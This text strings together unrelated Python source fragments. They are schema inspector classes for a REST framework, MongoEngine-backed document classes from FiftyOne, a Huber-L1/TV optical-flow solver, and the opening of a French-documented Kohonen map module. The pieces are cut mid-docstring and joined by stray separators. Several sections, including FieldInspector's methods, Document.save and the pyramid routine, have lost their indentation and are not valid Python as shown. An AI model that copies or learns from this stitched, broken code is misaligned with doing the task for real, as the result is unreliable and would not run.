        :rtype: list[type[rest_framework.parsers.BaseParser]]
        """
        return get_object_classes(call_view_method(self.view, 'get_parsers', 'parser_classes', []))
class PaginatorInspector(BaseInspector):
    """Base inspector for paginators.
    Responsible for determining extra query parameters and response structure added by given paginators.
    """

    def get_paginator_parameters(self, paginator):
        """Get the pagination parameters for a single paginator **instance**.
        Should return :data:`.NotHandled` if this inspector does not know how to handle the given `paginator`.
        :param BasePagination paginator: the paginator
        :rtype: list[openapi.Parameter]
        """
        return NotHandled

    def get_paginated_response(self, paginator, response_schema):
        """Add appropriate paging fields to a response :class:`.Schema`.
        Should return :data:`.NotHandled` if this inspector does not know how to handle the given `paginator`.
        :param BasePagination paginator: the paginator
        :param openapi.Schema response_schema: the response schema that must be paged.
        :rtype: openapi.Schema
        """
        return NotHandled
class FilterInspector(BaseInspector):
    """Base inspector for filter backends.
    Responsible for determining extra query parameters added by given filter backends.
    """

    def get_filter_parameters(self, filter_backend):
        """Get the filter parameters for a single filter backend **instance**.
        Should return :data:`.NotHandled` if this inspector does not know how to handle the given `filter_backend`.
        :param BaseFilterBackend filter_backend: the filter backend
        :rtype: list[openapi.Parameter]
        """
        return NotHandled
class FieldInspector(BaseInspector):
"""Base inspector for serializers and serializer fields. """
def __init__(self, view, path, method, components, request, field_inspectors):
    """Same context as :class:`BaseInspector`, plus the chain of field
    inspectors used for recursive probing of nested serializer fields.
    """
    super(FieldInspector, self).__init__(view, path, method, components, request)
    self.field_inspectors = field_inspectors
def add_manual_fields(self, serializer_or_field, schema):
    """Set fields from the ``swagger_schema_fields`` attribute on the Meta class. This method is called
    only for serializers or fields that are converted into ``openapi.Schema`` objects.
    :param serializer_or_field: serializer or field instance
    :param openapi.Schema schema: the schema object to be modified in-place
    """
    meta = getattr(serializer_or_field, 'Meta', None)
    swagger_schema_fields = getattr(meta, 'swagger_schema_fields', {})
    if swagger_schema_fields:
        # user-supplied values override the generated schema attributes
        for attr, val in swagger_schema_fields.items():
            setattr(schema, attr, val)
def field_to_swagger_object(self, field, swagger_object_type, use_references, **kwargs):
    """Convert a drf Serializer or Field instance into a Swagger object.
    Should return :data:`.NotHandled` if this inspector does not know how to handle the given `field`.
    :param rest_framework.serializers.Field field: the source field
    :param type[openapi.SwaggerDict] swagger_object_type: should be one of Schema, Parameter, Items
    :param bool use_references: if False, forces all objects to be declared inline
        instead of by referencing other components
    :param kwargs: extra attributes for constructing the object;
        if swagger_object_type is Parameter, ``name`` and ``in_`` should be provided
    :return: the swagger object
    :rtype: openapi.Parameter or openapi.Items or openapi.Schema or openapi.SchemaRef
    """
    # Default: defer to other inspectors in the chain.
    return NotHandled
def probe_field_inspectors(self, field, swagger_object_type, use_references, **kwargs):
    """Helper method for recursively probing `field_inspectors` to handle a given field.
    All arguments are the same as :meth:`.field_to_swagger_object`.
    :rtype: openapi.Parameter or openapi.Items or openapi.Schema or openapi.SchemaRef
    """
    # Pass field_inspectors through initkwargs so nested fields can recurse
    # with the same inspector chain.
    return self.probe_inspectors(
        self.field_inspectors, 'field_to_swagger_object', field, {'field_inspectors': self.field_inspectors},
        swagger_object_type=swagger_object_type, use_references=use_references, **kwargs
    )
def _get_partial_types(self, field, swagger_object_type, use_references, **kwargs):
"""Helper method to extract generic information from a field and return a partial constructor for the
appropriate openapi object.
All arguments are the same as :meth:`.field_to_swagger_object`.
The return value is a tuple consisting of:
* a function for constructing objects of `swagger_object_type`; its prototype is: ::
def SwaggerType(existing_object=None, **instance_kwargs):
This function creates an instance of `swagger_object_type`, passing the following attributes to its init,
in order of precedence:
- arguments specified by the ``kwargs`` parameter of :meth:`._get_partial_types`
- ``instance_kwargs`` passed to the constructor function
- ``title``, ``description``, ``required``, ``x-nullable`` and ``default`` inferred from the field,
where appropriate
If ``existing_object`` is not ``None``, it is updated instead of creating a new object.
* a type that should be used for child objects if `field` is of an array type. This can currently have two
values:
- :class:`.Schema` if `swagger_object_type` is :class:`.Schema`
- :class:`.Items` if `swagger_object_type` is :class:`.Parameter` or :class:`.Items`
:rtype: | |
"""
Base classes for documents that back dataset contents.
| Copyright 2017-2021, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
from copy import deepcopy
import json
import re
from bson import json_util, ObjectId
import mongoengine
import pymongo
import fiftyone.core.utils as fou
import eta.core.serial as etas
class SerializableDocument(object):
    """Mixin for documents that can be serialized in BSON or JSON format."""

    def __str__(self):
        # Delegate to __repr__ so str() and repr() render identically.
        return self.__repr__()

    def __repr__(self):
        return self.fancy_repr()

    def __eq__(self, other):
        # NOTE(review): defining __eq__ implicitly sets __hash__ to None,
        # making subclasses unhashable unless they define __hash__ -- confirm
        # this is intended.
        if not isinstance(other, self.__class__):
            return False
        # Equality is defined as full field-by-field (dict) equality.
        return self.to_dict() == other.to_dict()

    def fancy_repr(
        self,
        class_name=None,
        select_fields=None,
        exclude_fields=None,
        **kwargs
    ):
        """Generates a customizable string representation of the document.
        Args:
            class_name (None): optional class name to use
            select_fields (None): iterable of field names to restrict to
            exclude_fields (None): iterable of field names to exclude
            **kwargs: additional key-value pairs to include in the string
                representation
        Returns:
            a string representation of the document
        """
        d = {}
        for f in self._get_repr_fields():
            # Apply the select/exclude filters before rendering.
            if (select_fields is not None and f not in select_fields) or (
                exclude_fields is not None and f in exclude_fields
            ):
                continue
            # Private fields (leading underscore) are never shown.
            if not f.startswith("_"):
                value = getattr(self, f)
                if isinstance(value, ObjectId):
                    # Render ObjectIds as plain strings for readability.
                    d[f] = str(value)
                else:
                    d[f] = value
        d.update(kwargs)
        doc_name = class_name or self.__class__.__name__
        doc_str = fou.pformat(d)
        return "<%s: %s>" % (doc_name, doc_str)

    def has_field(self, field_name):
        """Determines whether the document has a field of the given name.
        Args:
            field_name: the field name
        Returns:
            True/False
        """
        raise NotImplementedError("Subclass must implement `has_field()`")

    def get_field(self, field_name):
        """Gets the field of the document.
        Args:
            field_name: the field name
        Returns:
            the field value
        Raises:
            AttributeError: if the field does not exist
        """
        raise NotImplementedError("Subclass must implement `get_field()`")

    def set_field(self, field_name, value, create=False):
        """Sets the value of a field of the document.
        Args:
            field_name: the field name
            value: the field value
            create (False): whether to create the field if it does not exist
        Raises:
            ValueError: if ``field_name`` is not an allowed field name or does
                not exist and ``create == False``
        """
        raise NotImplementedError("Subclass must implement `set_field()`")

    def clear_field(self, field_name):
        """Clears the field from the document.
        Args:
            field_name: the field name
        Raises:
            ValueError: if the field does not exist
        """
        raise NotImplementedError("Subclass must implement `clear_field()`")

    def _get_field_names(self, include_private=False):
        """Returns an ordered tuple of field names of this document.
        Args:
            include_private (False): whether to include private fields
        Returns:
            a tuple of field names
        """
        raise NotImplementedError("Subclass must implement `_get_field_names`")

    def _get_repr_fields(self):
        """Returns an ordered tuple of field names that should be included in
        the ``repr`` of the document.
        Returns:
            a tuple of field names
        """
        raise NotImplementedError("Subclass must implement `_get_repr_fields`")

    def copy(self):
        """Returns a deep copy of the document.
        Returns:
            a :class:`SerializableDocument`
        """
        return deepcopy(self)

    def to_dict(self, extended=False):
        """Serializes this document to a BSON/JSON dictionary.
        Args:
            extended (False): whether to serialize extended JSON constructs
                such as ObjectIDs, Binary, etc. into JSON format
        Returns:
            a dict
        """
        raise NotImplementedError("Subclass must implement `to_dict()`")

    @classmethod
    def from_dict(cls, d, extended=False):
        """Loads the document from a BSON/JSON dictionary.
        Args:
            d: a dictionary
            extended (False): whether the input dictionary may contain
                serialized extended JSON constructs
        Returns:
            a :class:`SerializableDocument`
        """
        raise NotImplementedError("Subclass must implement `from_dict()`")

    def to_json(self, pretty_print=False):
        """Serializes the document to a JSON string.
        Args:
            pretty_print (False): whether to render the JSON in human readable
                format with newlines and indentations
        Returns:
            a JSON string
        """
        d = self.to_dict(extended=True)
        return etas.json_to_str(d, pretty_print=pretty_print)

    @classmethod
    def from_json(cls, s):
        """Loads the document from a JSON string.
        Returns:
            a :class:`SerializableDocument`
        """
        d = json_util.loads(s)
        return cls.from_dict(d, extended=False)
class SampleDocument(SerializableDocument):
    """Interface for sample backing documents."""

    def __init__(self, *args, **kwargs):
        # Plain pass-through; concrete subclasses declare the actual fields.
        super().__init__(*args, **kwargs)

    @property
    def media_type(self):
        """The media type of the sample."""
        raise NotImplementedError("Subclass must implement `media_type`")

    @property
    def collection_name(self):
        """The name of the MongoDB collection to which this sample belongs, or
        ``None`` if it has not been added to a dataset.
        """
        # Default: not backed by any collection.
        return None

    @property
    def in_db(self):
        """Whether the sample has been added to the database."""
        # Default: samples start out unpersisted.
        return False

    @property
    def ingest_time(self):
        """The time the sample was added to the database, or ``None`` if it
        has not been added to the database.
        """
        return None
class MongoEngineBaseDocument(SerializableDocument):
    """Mixin for all ``mongoengine.base.BaseDocument`` subclasses that
    implements the :class:`SerializableDocument` interface.
    """

    def __delattr__(self, field_name):
        # Deleting an attribute clears the corresponding document field.
        self.clear_field(field_name)

    def __delitem__(self, field_name):
        # dict-style deletion mirrors attribute deletion.
        self.clear_field(field_name)

    def __deepcopy__(self, memo):
        # pylint: disable=no-member, unsubscriptable-object
        # Copy all fields except identity-related ones, so the copy is a new,
        # unsaved document.
        kwargs = {
            f: deepcopy(self[f], memo)
            for f in self._fields_ordered
            if f not in ("_cls", "_id", "id")
        }
        return self.__class__(**kwargs)

    def has_field(self, field_name):
        """Whether ``field_name`` is among this document's ordered fields."""
        return field_name in self._fields_ordered

    def get_field(self, field_name):
        """Returns the value of ``field_name``; raises ``AttributeError`` if
        the field does not exist.
        """
        return getattr(self, field_name)

    def set_field(self, field_name, value, create=False):
        """Sets ``field_name`` to ``value``; the field must already exist
        unless ``create == True``.
        """
        if not create and not self.has_field(field_name):
            raise ValueError("Document has no field '%s'" % field_name)
        setattr(self, field_name, value)

    def clear_field(self, field_name):
        """Removes ``field_name`` from the document."""
        if not self.has_field(field_name):
            raise ValueError("Document has no field '%s'" % field_name)
        super().__delattr__(field_name)
        # pylint: disable=no-member
        # If the field is dynamic (not declared on the class), also drop it
        # from this instance's field ordering.
        if field_name not in self.__class__._fields_ordered:
            self._fields_ordered = tuple(
                f for f in self._fields_ordered if f != field_name
            )

    def field_to_mongo(self, field_name):
        """Converts the current value of ``field_name`` to its MongoDB
        representation via the field's ``to_mongo``.
        """
        # pylint: disable=no-member
        value = self.get_field(field_name)
        return self._fields[field_name].to_mongo(value)

    def field_to_python(self, field_name, value):
        """Converts a MongoDB ``value`` for ``field_name`` back to Python via
        the field's ``to_python``.
        """
        # pylint: disable=no-member
        return self._fields[field_name].to_python(value)

    def _get_field_names(self, include_private=False):
        if not include_private:
            # Filter out private (underscore-prefixed) field names.
            return tuple(
                f for f in self._fields_ordered if not f.startswith("_")
            )
        return self._fields_ordered

    def _get_repr_fields(self):
        # pylint: disable=no-member
        return self._fields_ordered

    def to_dict(self, extended=False):
        if extended:
            # Plain JSON parse keeps extended constructs (ObjectId, Binary,
            # ...) in their extended-JSON dict form.
            return json.loads(self._to_json())
        # json_util parses extended JSON back into BSON types.
        return json_util.loads(self._to_json())

    @classmethod
    def from_dict(cls, d, extended=False):
        if not extended:
            try:
                # Attempt to load the document directly, assuming it is in
                # extended form
                # pylint: disable=no-member
                return cls._from_son(d)
            except Exception:
                pass
        # Normalize via an extended-JSON round-trip, then load.
        # pylint: disable=no-member
        bson_data = json_util.loads(json_util.dumps(d))
        return cls._from_son(bson_data)

    def _to_json(self):
        # @todo(Tyler) mongoengine snippet, to be replaced
        # pylint: disable=no-member
        return json_util.dumps(self.to_mongo(use_db_field=True))
class BaseDocument(MongoEngineBaseDocument):
    """Base class for documents that are written to the database in their own
    collections.
    The ID of a document is automatically populated when it is added to the
    database, and the ID of a document is ``None`` if it has not been added to
    the database.
    Attributes:
        id: the ID of the document, or ``None`` if it has not been added to the
            database
    """

    def __eq__(self, other):
        """Documents are equal when their IDs and all fields match.

        Fix: comparing against an object of a different type (e.g. ``None``)
        previously raised ``AttributeError`` when accessing ``other.id``; it
        now correctly evaluates as not-equal, consistent with the isinstance
        check performed by :meth:`SerializableDocument.__eq__`.
        """
        # pylint: disable=no-member
        if not isinstance(other, self.__class__):
            return False
        # Cheap ID comparison first; fall back to full field comparison.
        if self.id != other.id:
            return False
        return super().__eq__(other)

    def _get_repr_fields(self):
        """Returns the field names with ``id`` forced to the front."""
        # pylint: disable=no-member
        return ("id",) + tuple(f for f in self._fields_ordered if f != "id")

    @property
    def ingest_time(self):
        """The time the document was added to the database, or ``None`` if it
        has not been added to the database.
        """
        # ObjectIds expose their creation timestamp via generation_time.
        # pylint: disable=no-member
        return self.id.generation_time if self.in_db else None

    @property
    def in_db(self):
        """Whether the underlying :class:`fiftyone.core.odm.Document` has
        been inserted into the database.
        """
        # The id is only populated once the document has been inserted.
        # pylint: disable=no-member
        return self.id is not None
class BaseEmbeddedDocument(MongoEngineBaseDocument):
    """Base class for documents that are embedded within other documents and
    therefore are not stored in their own collection in the database.
    """

    # No additional behavior; everything is inherited from
    # MongoEngineBaseDocument.
    pass
class Document(BaseDocument, mongoengine.Document):
"""Base class for documents that are stored in a MongoDB collection.
The ID of a document is automatically populated when it is added to the
database, and the ID of a document is ``None`` if it has not been added to
the database.
Attributes:
id: the ID of the document, or ``None`` if it has not been added to the
database
"""
meta = {"abstract": True}
def save(self, validate=True, clean=True, **kwargs):
"""Save the :class:`Document` to the database.
If the document already exists, it will be updated, otherwise it will
be created.
Args:
validate (True): validates the document
clean (True): call the document's clean method; requires
``validate`` to be True
Returns:
self
"""
# pylint: disable=no-member
if self._meta.get("abstract"):
raise mongoengine.InvalidDocumentError(
"Cannot save an abstract document."
)
if validate:
self.validate(clean=clean)
doc_id = self.to_mongo(fields=[self._meta["id_field"]])
created = "_id" not in doc_id or self._created
# It might be refreshed by the pre_save_post_validation hook, e.g., for
# etag generation
doc = self.to_mongo()
if self._meta.get("auto_create_index", True):
self.ensure_indexes()
try:
# Save a new document or update an existing one
if created:
# Save new document
# insert_one will provoke UniqueError alongside save does not
# therefore, it need to catch and call replace_one.
collection = self._get_collection()
object_id = None
if "_id" in doc:
raw_object = collection.find_one_and_replace(
{"_id": doc["_id"]}, doc
)
if raw_object:
object_id = doc["_id"]
if not object_id:
object_id = collection.insert_one(doc).inserted_id
else:
# Update existing document
object_id = doc["_id"]
created = False
updates, removals = self._delta()
update_doc = | |
<gh_stars>1-10
# coding: utf-8
import numpy
import scipy
from scipy import ndimage
import numpy as np
from scipy import misc
from PIL import Image
from pyinterp2.interp2 import interp2linear
# In[36]:
import numpy
import scipy
#noinspection PyPep8Naming
import matplotlib.pyplot as plt
# In[38]:
def rgb2gray(rgb):
    """Convert an RGB image array to grayscale.

    Uses the same luma weights and rounding as MATLAB's ``rgb2gray``; any
    channels beyond the first three are ignored.
    """
    luma_weights = [0.2989, 0.5870, 0.1140]  # matlab's version
    return np.dot(rgb[..., :3], luma_weights).round()
class MyStruct:
    """Minimal mutable attribute container (MATLAB-struct stand-in).

    Callers attach whatever fields they need dynamically.
    """

    def __init__(self):
        # Placeholder attribute kept for compatibility with the original.
        self.ololo = 1
#TODO: check for several sizes
#noinspection PyPep8Naming,PyPep8Naming,PyPep8Naming
def extend(I, shape):
    """
    Extends 2-D array ``I`` to ``shape`` by repeating its last row and/or
    column as many times as needed.

    Fix: removed the dead ``r = [0, 0]`` assignment that was immediately
    overwritten inside the loop.
    """
    Inew = I
    for axis in [0, 1]:
        # Repeat every element once along this axis, except the last one,
        # which is repeated enough times to reach the target size.
        reps = numpy.ones(Inew.shape[axis], dtype='int32')
        reps[-1] = shape[axis] - Inew.shape[axis] + 1
        Inew = np.repeat(Inew, reps, axis=axis)
    return Inew
#TODO: add antialiasing to work like matlab
#noinspection PyPep8Naming
def my_resize(I, factor):
    """
    Downsamples a 2-D array by a factor of 0.5 via 2x2 block averaging.

    Odd-sized inputs are handled by padding each of the four sampling phases
    (via ``extend``) to the rounded half-size before averaging.

    Raises:
        Exception: for any factor other than 0.5.
    """
    if factor != 0.5:
        raise Exception("Unsupported resize factor!")
    newshape = numpy.round((numpy.array(I.shape)) / 2.).astype('int32')
    # Average the four 2x2-block phases. Fix: the second slice below was
    # corrupted in the source (an anonymizer replaced '1::2' with an IPv6-like
    # token, a syntax error); restored from the symmetric pattern.
    res = (
        extend(I[0::2, 0::2], newshape) +
        extend(I[0::2, 1::2], newshape) +
        extend(I[1::2, 0::2], newshape) +
        extend(I[1::2, 1::2], newshape)) / 4
    return res
import scipy.signal
def median_filter_symmetric(x, r):
    """Median-filter 2-D array ``x`` with kernel size ``r``, using symmetric
    (mirror) padding at the borders so the output has the same shape as the
    input.
    """
    pad = r
    mirrored = numpy.pad(x, pad_width=pad, mode='symmetric')
    smoothed = scipy.signal.medfilt2d(mirrored, r)
    # Crop the padding back off to restore the original shape.
    return smoothed[pad:-pad, pad:-pad]
# In[60]:
from scipy.sparse import coo_matrix
def makeweights_helper(abs_diff, params):
    """Map absolute intensity differences to edge weights.

    Differences are min-max normalized, passed through a decaying exponential
    controlled by ``params.beta``, and blended toward 1 by ``params.nu`` so
    that weights stay strictly positive.
    """
    epsilon = 1e-5
    lo = numpy.min(abs_diff)
    hi = numpy.max(abs_diff)
    span = hi - lo
    if span == 0:
        # Constant input: avoid division by zero; all weights become equal.
        span = 1.
    normalized = (abs_diff - lo) / span
    decayed = numpy.exp(-(params.beta * normalized)) + epsilon
    return params.nu + (1 - params.nu) * decayed
def makeweights(I0_, params):
    """Build weighted forward-difference operators for image ``I0_``.

    Returns ``(D1, D2)``: sparse (M*N, M*N) COO matrices whose rows compute
    weighted differences between horizontally-adjacent (D1) and
    vertically-adjacent (D2) pixels; weights come from
    ``makeweights_helper`` applied to the local intensity differences.
    """
    # column-major (Fortran) ravel everywhere to match MATLAB-style indexing
    args = dict(order='F')
    M, N = I0_.shape
    MN = M * N
    X, Y = np.meshgrid(np.arange(N), np.arange(M))
    # horizontal neighbors: |I(y, x) - I(y, x+1)|
    abs_diff = numpy.abs(I0_[:, :-1] - I0_[:, 1:])
    weights = makeweights_helper(abs_diff, params)
    coords1 = numpy.vstack([Y[:, :-1].ravel(**args), X[:, :-1].ravel(**args)])
    coords2 = numpy.vstack([Y[:, 1:].ravel(**args), X[:, 1:].ravel(**args)])
    # linear (column-major) indices of each pixel and its right neighbor
    edges1 = np.ravel_multi_index(coords1, I0_.shape, **args)
    edges2 = np.ravel_multi_index(coords2, I0_.shape, **args)
    # each populated row holds -w at the pixel and +w at its neighbor
    D1 = coo_matrix(
        (
            numpy.hstack([-weights.ravel(**args), weights.ravel(**args)]),
            (numpy.hstack([edges1, edges1]), numpy.hstack([edges1, edges2])),
        ),
        shape=(MN, MN)
    )
    # vertical neighbors: |I(y, x) - I(y+1, x)|
    abs_diff = numpy.abs(I0_[:-1, :] - I0_[1:, :])
    weights = makeweights_helper(abs_diff, params)
    coords1 = numpy.vstack([Y[:-1, :].ravel(**args), X[:-1, :].ravel(**args)])
    coords2 = numpy.vstack([Y[1:, :].ravel(**args), X[1:, :].ravel(**args)])
    edges1 = np.ravel_multi_index(coords1, I0_.shape, **args)
    edges2 = np.ravel_multi_index(coords2, I0_.shape, **args)
    D2 = coo_matrix(
        (
            numpy.hstack([-weights.ravel(**args), weights.ravel(**args)]),
            (numpy.hstack([edges1, edges1]), numpy.hstack([edges1, edges2])),
        ),
        shape=(MN, MN)
    )
    return D1, D2,
#%% Computes Lipschitz constant
def compute_lipschitz_constant(normAtA, alpha, mu_data, mu_tv):
    """Lipschitz constant of the smoothed energy's gradient.

    L = 8*alpha/mu_tv (TV term) + normAtA/mu_data (data term).
    """
    tv_part = 8 * alpha / mu_tv
    data_part = normAtA / mu_data
    return tv_part + data_part
#%% Computes the derivative of the TV term
def df_tv(x, x0, mu, Dt, D1, D2):
    """Value and gradient of the Huber-smoothed weighted-TV term.

    See Eq. 17 at Ayvaci, Raptis, Soatto, NIPS'10. ``x`` is the current
    increment and ``x0`` the initialization; the term is evaluated at x + x0.
    Returns (df, f).
    """
    total = x + x0
    gx = D1.dot(total)
    gy = D2.dot(total)
    magnitude = (gx * gx + gy * gy) ** .5
    # Huber smoothing: keep the divisor bounded away from zero by mu.
    denom = numpy.maximum(magnitude, mu)
    df = Dt.dot(numpy.vstack([gx / denom, gy / denom]))
    f = magnitude.sum()
    return df, f
#%% Computes the derivative of the Huber-L1 norm on x
def huber_l1(x, mu):
    """Huber-smoothed L1 norm: quadratic for small entries, linear otherwise.

    Returns the scalar sum over all elements.
    NOTE(review): the branch condition compares ``x`` itself (not ``|x|``)
    against mu, exactly as in the original -- confirm this is intended for
    negative inputs.
    """
    fx = numpy.where(
        x <= mu,
        x ** 2 / (2 * mu),            # quadratic region
        numpy.abs(x) - (mu / 2),      # linear region
    )
    return numpy.sum(fx)
# Computes the derivative of the Huber-L1 norm on the data term |Ax + b|
def df_huber_l1_Axplusb(x, A, b, mu):
    """Value and gradient of the Huber-L1 data term |Ax + b|.

    Returns (df, f) where f is the Huber-L1 norm of the residual and df its
    gradient with respect to x.
    """
    residual = A.dot(x) + b
    abs_residual = numpy.abs(residual)
    # Huber smoothing: divisor clamped below by mu.
    scaled = residual / numpy.maximum(abs_residual, mu)
    df = A.T.dot(scaled)
    f = huber_l1(residual, mu)
    return df, f
# Computes the derivative
def compute_df(x, A, b, u0, v0, alpha, mu_data, mu_tv, Dt, D1, D2):
    """Value and gradient of the full flow energy: Huber-L1 data term plus
    alpha-weighted Huber-TV regularization on each flow component.

    ``x`` stacks the u and v increments, each of length M*N; ``u0``/``v0``
    are the corresponding initializations. Returns (df, f).

    Fix: ``x.shape[0] / 2`` is float division under Python 3, which made the
    slices below raise ``TypeError``; use integer floor division instead.
    """
    MN = x.shape[0] // 2
    MN2 = 2 * MN
    df1, f1 = df_huber_l1_Axplusb(x, A, b, mu_data)
    # TV term on each flow component separately.
    df2, f2 = df_tv(x[0: MN], u0, mu_tv, Dt, D1, D2)
    df3, f3 = df_tv(x[MN:MN2], v0, mu_tv, Dt, D1, D2)
    df = df1 + alpha * numpy.vstack([df2, df3])
    f = f1 + alpha * (f2 + f3)
    return df, f
def visualize(k, x, stats, A, b, u0, v0, M, N):
    """Quiver-plot the current flow estimate (increment plus initialization)
    into matplotlib figure 100.
    """
    MN = M * N
    # Unstack the u/v increments, add the initialization, and reshape
    # column-major (data is stored Fortran-ordered throughout this module).
    u = (x[0:MN] + u0).reshape([N, M]).T
    v = (x[MN:] + v0).reshape([N, M]).T
    plt.figure(100)
    plt.quiver(u, v, scale_units='xy', angles='xy')
    plt.xlim(-1, M + 1)
    plt.ylim(-1, N + 1)
# pyramid generation and flow estimation
def Huber_L1_wTV_nesterov_core(A, b, u0_, v0_, D1, D2, M, N, params):
    """Minimize the Huber-L1 data + weighted-TV flow energy with Nesterov's
    accelerated first-order scheme.

    Iterates from a zero increment until either ``params.maxiters`` is reached
    or the energy stagnates (relative change below 1e-4 vs. the mean of the
    last 10 iterations). Returns the stacked absolute flow
    (increment + initialization), shape (2*M*N, 1).
    """
    MN = M * N
    MN2 = MN * 2
    At = A.T
    Atb = At.dot(b)
    AtA = At.dot(A)
    AAt = A.dot(At)
    # Largest diagonal entry of A A^T used as the norm estimate for the
    # Lipschitz constant -- assumes A A^T is (near-)diagonal; TODO confirm
    normAtA = max(AAt.diagonal())
    D1 = D1
    D2 = D2
    # Stacked transpose of both difference operators for gradient assembly
    Dt = scipy.sparse.vstack([D1, D2]).T
    # %% Parameters
    alpha = params.alpha
    mu_data = params.mu_data
    mu_tv = params.mu_tv
    # %% Initialize
    x0 = numpy.zeros([MN2, 1])
    xk = x0
    xold = xk
    L = compute_lipschitz_constant(normAtA, alpha, mu_data, mu_tv)
    # initialize statistics storage
    stats = MyStruct()
    stats.f = numpy.zeros([1, params.maxiters])
    stats.energy = numpy.zeros([params.maxiters])
    stats.conver = numpy.zeros([params.maxiters])
    k = 0
    iteration = 1
    stop = False
    wdf = 0
    while not stop and iteration < params.maxiters:
        # step (1) compute the derivative
        df, f = compute_df(xk, A, b, u0_, v0_, alpha, mu_data, mu_tv, Dt, D1, D2)
        # step (2) update yk (plain gradient step)
        yk = xk - (1 / L) * df
        # step (3) update zk (weighted-gradient step from the initial point)
        alphak = (k + 1) / 2.
        wdf += alphak * df
        zk = x0 - (1 / L) * wdf
        # step (4) blend yk and zk
        tauk = 2. / (k + 3)
        xkp = tauk * zk + (1 - tauk) * yk
        xk = xkp
        # save statistics
        stats.energy[iteration] = f
        if iteration > 10:
            # relative energy change vs. the mean of the last 10 iterations
            iterm10 = iteration - 10
            fbar = numpy.mean(stats.energy[iterm10:iteration])
            convergence = abs(f - fbar) / fbar
            if convergence < 1e-4:
                stop = True
        # visualize every 100 iterations and on the final/stopping iteration
        if params.display and (((k + 1) % 100) == 1 or stop or ((iteration + 1) == params.maxiters)):
            visualize(k, xk, stats, A, b, u0_, v0_, M, N)
        xold = xk
        k += 1
        iteration += 1
    # add the initialization back to obtain the absolute flow
    xk = xk + numpy.vstack([u0_, v0_])
    return xk
# In[116]:
#np.set_printoptions(precision=5, linewidth = 250)
##At.todense()
##print L, normAtA, alpha, params.alpha, df
#df, f = compute_df(xk, A, b, u0_, v0_, alpha, mu_data, mu_tv, Dt, D1, D2);
def Huber_L1_wTV_nesterov(I0, I1warped, u0, v0, Ix, Iy, It, params):
    """Single-level Huber-L1 / weighted-TV optical-flow solve.

    Builds the linearized data term A x + b from the image derivatives
    (Ix, Iy, It), the weighted difference operators from I0, and runs the
    Nesterov core solver starting from (u0, v0). Returns (u, v), each of
    shape (M, N).
    NOTE(review): I1warped is not used in this function -- confirm whether it
    is needed or can be dropped from the signature.
    """
    M, N = I0.shape
    # column-major ravel to match the Fortran-ordered indexing used throughout
    b = It.T.reshape([-1, 1])
    # A = [diag(Ix) diag(Iy)] so that A x linearizes the brightness constancy
    A = scipy.sparse.hstack([
        scipy.sparse.diags([Ix.T.ravel()], [0]),
        scipy.sparse.diags([Iy.T.ravel()], [0]),
    ])
    D1, D2 = makeweights(I0, params)
    x = Huber_L1_wTV_nesterov_core(A, b, u0.reshape(-1, 1, order='F'), v0.reshape(-1, 1, order='F'), D1, D2, M, N,
                                   params)
    # unstack the solution back into per-pixel u and v images
    x = x.reshape([2, M * N]).T
    u = x[:, 0].reshape([N, M]).T
    v = x[:, 1].reshape([N, M]).T
    return u, v
import sys
def construct_image_pyramid(I, pyrlevels, pyrfactor):
    """Build a Gaussian image pyramid with ``pyrlevels`` levels.

    Levels are indexed [0, pyrlevels-1]; pyr[0] is the original image and each
    subsequent level is Gaussian-smoothed then downsampled by ``pyrfactor``
    (only 0.5 is supported by ``my_resize``).
    """
    factor = 2. ** .5
    # anti-aliasing: smoothing sigma scaled to the downsampling step
    smooth_sigma = (1. / pyrfactor) ** .5 / factor
    pyr = []
    tmp = I
    pyr.append(I)
    for m in range(pyrlevels - 1):
        filt1 = scipy.ndimage.filters.gaussian_filter(tmp, smooth_sigma, order=0, output=None, mode='reflect', cval=0.0,
                                                      truncate=2.0)
        filt1r = my_resize(filt1, pyrfactor)
        tmp = filt1r
        pyr.append(filt1r)
    return pyr
def Huber_L1_wTV_nesterov_pyramid(I0, I1):
params = MyStruct()
pyrfactor = .5
warps = 5
pyrlevels = 2
# ALPHA is the coefficient of the regularizer. When the option do_varying_alpha is selected,
# for each pyramid level, its value varies between the values alpha0 and alphamax with the
# multiplier alphamult at each warping step.
params.do_varying_alpha = True
if params.do_varying_alpha:
params.alpha0 = 0.006
params.alphamult = 5
params.alphamax = 0.8
else:
params.alpha = 0.2
# Thresholds for Huber-L1 norm for data term and regularizer
params.mu_tv = 0.01
params.mu_data = 0.01
# Parameters of weights for gradients: w(x) = NU - (1-NU) exp(-BETA |\nabla I(x)|^2_2)
params.beta = 30
params.nu = 0.01
params.maxiters = 500 # max number of iterations for each optimization loop
params.display = True # display results
iscolor = False
I0pyr = construct_image_pyramid(I0, pyrlevels, pyrfactor)
I1pyr = construct_image_pyramid(I1, pyrlevels, pyrfactor)
import scipy.ndimage
#level = pyrlevels - 1
for level in range(pyrlevels - 1, -1, -1):
M, N = | |
<gh_stars>0
def triedctk():
    """
    The ctk methods: Kohonen Topological Maps (Cartes Topologiques de Kohonen)
    findbmus    : Finds the closest reference vectors (Best Match Units)
    mbmus       : Finds the multiple bmus ordered from closest to farthest
    errtopo     : Topographic error (rectangular maps only)
    findhits    : Computes the number of data items captured by each referent
    showmap     : Displays the map variables
    showmapping : Shows the deployment of the map in data space (pairwise)
    showcarte   : Displays the map according to various parameters
    showbarcell : Displays the map's referents as bar charts
    showprofils : Shows the referents and/or their data as curves
    showrefactiv: Shows the neuron activations (inverse distance)
                  as a function of the presented patterns
    showrefpat  : Shows the (integrated) patterns captured by the neurons
    cblabelmaj  : Labels the referents by majority vote
    reflabfreq  : Frequency table of the labels per referent
    cblabvmaj   : Referent labels assigned by majority vote
    cblabfreq   : Label frequencies of the referents' 'Labels'
    label2ind   : Converts string labels into (integer) indices
    mapclassif  : Classifies data with the map.
    classifperf : Classification performance
    """
    return None
import sys
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
from triedpy import triedtools as tls
#def ctk_bmus (sm, Data=None) :
def findbmus (sm, Data=None) :
''' BMUS = findbmus (sm, Data) :
| Passer la structure de la carte (sm) d'ou on tirera les référents
| (sm.codebook) et accessoirement les données pour récupérer en sortie
| les BMUS (Il devrait bien y avoir une fonction équivalente dans Sompy,
| mais pour le moment, je ne l'ai pas identifiée)
| Si Data n'est pas renseignée on prend les données de la structure sm
| qui sont sensées correspondre aux données d'apprentissage de la carte.
| Il est suggéré d'appeler une fois cette fonction pour garder les bmus
| qui sont susceptibles d'être utilisés plusieurs fois par la suite.
| Incidemment, on remarque que l'on peut obtenir des bmus pour d'autres
| données (comme celles de test par exemple)
